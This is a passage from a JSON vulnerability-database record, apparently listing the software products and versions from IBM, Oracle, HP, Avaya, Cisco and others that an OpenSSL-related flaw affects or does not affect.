presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jre update15", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.19" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.590" }, { "model": "java", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.600" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.50" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "workcentre r1", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "6400061.070.105.25200" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "db2 connect application server advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "network node manager ispi for ip telephony", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87310" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.5" }, { "model": "system m4 hdtype", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7910" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.5" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "websphere mq for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "jdk update33", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.21" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.13" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.15" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.045" }, { "model": "jre update10", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere real time sr9", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "domino fix pack interim f", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.12" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.52" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "jdk update6", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "jre update7", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "jdk update10", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "infosphere optim data masking solution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3.0.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "link for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.2.0.28" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.9" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73230" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "domino fp if4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "jre update13", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "355025.003.33.000" }, { "model": "buildforge ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.37" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "netezza platform software 7.1.0.5-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "jdk update21", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.18" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "tivoli composite application manager for soa", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "db2 query management facility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "network node manager i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x57145" }, { "model": "java sdk sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.00" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.60" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35001.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.041" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "flashsystem 9846-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "app for vmware", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk update25", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "chassis management module 2pet12h", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.2.0" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "bbm protected on ios", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "2.7.0.32" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "security identity governance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli storage manager operations center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.200" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "jdk update27", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.43" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.04" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jdk update15", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "platform cluster manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "network node manager ispi performance for qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.122" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.027" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "db2 enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "db2 connect application server advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "content analysis system", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.2.3.1" }, { "model": "chassis management module 2pet12d", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571460" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.025" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "work browser for bes10/bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.1.17483.17" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.05" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3.3" }, { "model": "tivoli asset management for it", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.18" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "network node manager ispi performance for metrics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "jdk update25", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.250" }, { "model": "db2 advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "hp-ux b.11.23 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.12" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.21" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.4" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "websphere mq mqipt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.033" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "cognos tm1 fp4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.12" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.43" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "bbm protected on android", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "2.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "domino interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.03" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "domino fix pack interim f", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.15" }, { "model": "mashup center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.7" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "netezza platform software 7.0.2.16-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "jdk update9", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.043" }, { "model": "jre update26", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.260" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.060" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.411" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6.0" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "6.0" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java sdk sr14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "link for mac os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.2.1.16" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.5" }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": 